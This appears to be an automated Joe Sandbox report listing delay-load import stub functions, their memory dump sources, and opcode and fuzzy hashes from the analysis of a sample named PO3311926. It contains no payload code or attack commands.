Function 00BBE532 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BBE51F

Part of subcall function 00BBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BBE8D0
Part of subcall function 00BBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BBE8E1

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: a7f5288cf70884c0d2bb4e46b594690c708816fec7d061a60a15a646eecd61fd
Instruction ID: 82078f4940e72196f4c732037cd0bd06601fadad77d4da8cf158d2ae2ef99e34
Opcode Fuzzy Hash: a7f5288cf70884c0d2bb4e46b594690c708816fec7d061a60a15a646eecd61fd
Instruction Fuzzy Hash: 96B012C12994417F350462085C02DFB05CDC0C2F1433041EFF824C11E0FCC0CC044432

Uniqueness

Uniqueness Score: -1.00%

Function 00BBE528 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BBE51F

Part of subcall function 00BBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BBE8D0
Part of subcall function 00BBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BBE8E1

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 52b41609426dfb33fe075ccfd5fc0bc29b4c243b8b035bff640485aa243f0616
Instruction ID: 23159d5f82d9a5685623ed9988fa22824c54d493590093c75b1fe998dffb16f3
Opcode Fuzzy Hash: 52b41609426dfb33fe075ccfd5fc0bc29b4c243b8b035bff640485aa243f0616
Instruction Fuzzy Hash: B9B012C12994827E350462095D02CFB49CDC0C2F1433081EFF924C11E0FCC0CC014432

Uniqueness

Uniqueness Score: -1.00%

Function 00BBE50D Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BBE51F

Part of subcall function 00BBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BBE8D0
Part of subcall function 00BBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BBE8E1

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 0fe10c1f326a68066812093d6ccfbe412fbb4c6091744a24a1553a9a5b7edf87
Instruction ID: 2dc42f6f1106fdd71b5bf357d23805c11fcbea026e37df4de6086072cb68c7c5
Opcode Fuzzy Hash: 0fe10c1f326a68066812093d6ccfbe412fbb4c6091744a24a1553a9a5b7edf87
Instruction Fuzzy Hash: 2CB012D12994417E350421245C06CFB05CDC0C2F1433041FFF430C04E1F8C0CD044432

Uniqueness

Uniqueness Score: -1.00%

Function 00BBE546 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BBE51F

Part of subcall function 00BBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BBE8D0
Part of subcall function 00BBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BBE8E1

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: dcd69101c8de0172afd49235e2d998fa12a6043e47d2fe702960e1ac2a2c8e31
Instruction ID: f3785fd304f78117799aeb4eae9131069d4f250f7adac7cf0372fb94ad740717
Opcode Fuzzy Hash: dcd69101c8de0172afd49235e2d998fa12a6043e47d2fe702960e1ac2a2c8e31
Instruction Fuzzy Hash: F6B012C16995417E360461089C0BCFB09CDC0C2F1433083EFF424C11E0F8C0CD444432

Uniqueness

Uniqueness Score: -1.00%

Function 00BBE2AF Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BBE1E3

Part of subcall function 00BBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BBE8D0
Part of subcall function 00BBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BBE8E1

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 1a7edfa04888a3a799b2cdbdd109fa150240d1f890a9f0e7169036445e52e1a6
Instruction ID: 8f783e01db715d457a31eab5b067139004ad716848fdb29046e44b207a5e1d67
Opcode Fuzzy Hash: 1a7edfa04888a3a799b2cdbdd109fa150240d1f890a9f0e7169036445e52e1a6
Instruction Fuzzy Hash: B5A011E22A8002BE30082202AC03CFB02CEC0C0B20330C8AEF822C00A0B8C0A8000830

Uniqueness

Uniqueness Score: -1.00%

Function 00BBE2A5 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BBE1E3

Part of subcall function 00BBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BBE8D0
Part of subcall function 00BBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BBE8E1

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 3a8992a30c34721fafef9566ae410ac4430377f319fb39d397b2ce9db033eea6
Instruction ID: 8f783e01db715d457a31eab5b067139004ad716848fdb29046e44b207a5e1d67
Opcode Fuzzy Hash: 3a8992a30c34721fafef9566ae410ac4430377f319fb39d397b2ce9db033eea6
Instruction Fuzzy Hash: B5A011E22A8002BE30082202AC03CFB02CEC0C0B20330C8AEF822C00A0B8C0A8000830

Uniqueness

Uniqueness Score: -1.00%

Function 00BBE29B Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BBE1E3

Part of subcall function 00BBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BBE8D0
Part of subcall function 00BBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BBE8E1

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: fa7f3d1c38cd245611d8c5b48c6d0f1699f5964b573e5e2c2807e05995b2455f
Instruction ID: 8f783e01db715d457a31eab5b067139004ad716848fdb29046e44b207a5e1d67
Opcode Fuzzy Hash: fa7f3d1c38cd245611d8c5b48c6d0f1699f5964b573e5e2c2807e05995b2455f
Instruction Fuzzy Hash: B5A011E22A8002BE30082202AC03CFB02CEC0C0B20330C8AEF822C00A0B8C0A8000830

Uniqueness

Uniqueness Score: -1.00%

Function 00BBE291 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BBE1E3

Part of subcall function 00BBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BBE8D0
Part of subcall function 00BBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BBE8E1

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 6d758a6f4c227b0afdb1e154ccc91a66a291f637ef3efae579f711f9341ab318
Instruction ID: 8f783e01db715d457a31eab5b067139004ad716848fdb29046e44b207a5e1d67
Opcode Fuzzy Hash: 6d758a6f4c227b0afdb1e154ccc91a66a291f637ef3efae579f711f9341ab318
Instruction Fuzzy Hash: B5A011E22A8002BE30082202AC03CFB02CEC0C0B20330C8AEF822C00A0B8C0A8000830

Uniqueness

Uniqueness Score: -1.00%

Function 00BBE2D7 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BBE1E3

Part of subcall function 00BBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BBE8D0
Part of subcall function 00BBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BBE8E1

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: d1bc03ce8e5912bd73fd3f5a1fa03e387c2710800b8e2771908ffc72cc2f6cc3
Instruction ID: 8f783e01db715d457a31eab5b067139004ad716848fdb29046e44b207a5e1d67
Opcode Fuzzy Hash: d1bc03ce8e5912bd73fd3f5a1fa03e387c2710800b8e2771908ffc72cc2f6cc3
Instruction Fuzzy Hash: B5A011E22A8002BE30082202AC03CFB02CEC0C0B20330C8AEF822C00A0B8C0A8000830

Uniqueness

Uniqueness Score: -1.00%

Function 00BBE2CD Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BBE1E3

Part of subcall function 00BBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BBE8D0
Part of subcall function 00BBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BBE8E1

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 311f505cc52df4b101c333a3e0cd1899d270cac62e77e396a8a2a9a8e78ad4e5
Instruction ID: 8f783e01db715d457a31eab5b067139004ad716848fdb29046e44b207a5e1d67
Opcode Fuzzy Hash: 311f505cc52df4b101c333a3e0cd1899d270cac62e77e396a8a2a9a8e78ad4e5
Instruction Fuzzy Hash: B5A011E22A8002BE30082202AC03CFB02CEC0C0B20330C8AEF822C00A0B8C0A8000830

Uniqueness

Uniqueness Score: -1.00%

Function 00BBE2C3 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BBE1E3

Part of subcall function 00BBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BBE8D0
Part of subcall function 00BBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BBE8E1

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: b2a2a99d0d7d86ccd8ac54eb9577745ecb75d5d8ae77e8db75730f36cdc7c949
Instruction ID: 8f783e01db715d457a31eab5b067139004ad716848fdb29046e44b207a5e1d67
Opcode Fuzzy Hash: b2a2a99d0d7d86ccd8ac54eb9577745ecb75d5d8ae77e8db75730f36cdc7c949
Instruction Fuzzy Hash: B5A011E22A8002BE30082202AC03CFB02CEC0C0B20330C8AEF822C00A0B8C0A8000830

Uniqueness

Uniqueness Score: -1.00%

Function 00BBE219 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BBE1E3

Part of subcall function 00BBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BBE8D0
Part of subcall function 00BBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BBE8E1

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: bf585a55fadc3c1fee5e1101d052f6f71219f0af84417faaa72d00cf23f53fa0
Instruction ID: 8f783e01db715d457a31eab5b067139004ad716848fdb29046e44b207a5e1d67
Opcode Fuzzy Hash: bf585a55fadc3c1fee5e1101d052f6f71219f0af84417faaa72d00cf23f53fa0
Instruction Fuzzy Hash: B5A011E22A8002BE30082202AC03CFB02CEC0C0B20330C8AEF822C00A0B8C0A8000830

Uniqueness

Uniqueness Score: -1.00%

Function 00BBE27D Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BBE1E3

Part of subcall function 00BBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BBE8D0
Part of subcall function 00BBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BBE8E1

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: cf4658da5709530f2a85dc59be114d5f388ecda728bbe50dd172719e0d1e0048
Instruction ID: 8f783e01db715d457a31eab5b067139004ad716848fdb29046e44b207a5e1d67
Opcode Fuzzy Hash: cf4658da5709530f2a85dc59be114d5f388ecda728bbe50dd172719e0d1e0048
Instruction Fuzzy Hash: B5A011E22A8002BE30082202AC03CFB02CEC0C0B20330C8AEF822C00A0B8C0A8000830

Uniqueness

Uniqueness Score: -1.00%

Function 00BBE25F Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BBE1E3

Part of subcall function 00BBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BBE8D0
Part of subcall function 00BBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BBE8E1

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: ad9bed6dbcb13be6aa506bff8e571b8828195af8159dc6d2f9cb86a2e2e522ff
Instruction ID: 8f783e01db715d457a31eab5b067139004ad716848fdb29046e44b207a5e1d67
Opcode Fuzzy Hash: ad9bed6dbcb13be6aa506bff8e571b8828195af8159dc6d2f9cb86a2e2e522ff
Instruction Fuzzy Hash: B5A011E22A8002BE30082202AC03CFB02CEC0C0B20330C8AEF822C00A0B8C0A8000830

Uniqueness

Uniqueness Score: -1.00%

Function 00BBE3EF Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BBE3FC

Part of subcall function 00BBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BBE8D0
Part of subcall function 00BBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BBE8E1

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: d2ddf329d97258893aaa81ea6aaca39106ad1073c8cbaa4897995c336da25a8e
Instruction ID: 6f57e2e0320c3784bd5dff851214a91384a00fd301ad9866c2eb8bcfeaa2e831
Opcode Fuzzy Hash: d2ddf329d97258893aaa81ea6aaca39106ad1073c8cbaa4897995c336da25a8e
Instruction Fuzzy Hash: 8EA011E22A80023E30882200AC82CFB02CEC0C0B2033080AEF830AA0E0BCC0880028B2

Uniqueness

Uniqueness Score: -1.00%

Function 00BBE43C Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BBE3FC

Part of subcall function 00BBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BBE8D0
Part of subcall function 00BBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BBE8E1

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 9c05691cac6e0ec42c11d6f6303414d6972988a414940f8c6a6c61a6842cc130
Instruction ID: 59655488f1afe76dc505aca4494920578a89054e54eb404057cdc81bb70ebdc3
Opcode Fuzzy Hash: 9c05691cac6e0ec42c11d6f6303414d6972988a414940f8c6a6c61a6842cc130
Instruction Fuzzy Hash: 10A012E11580027D304412005C42CF702CDC0C0B1033044AEF421850E0B8C088001472

Uniqueness

Uniqueness Score: -1.00%

Function 00BBE432 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BBE3FC

Part of subcall function 00BBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BBE8D0
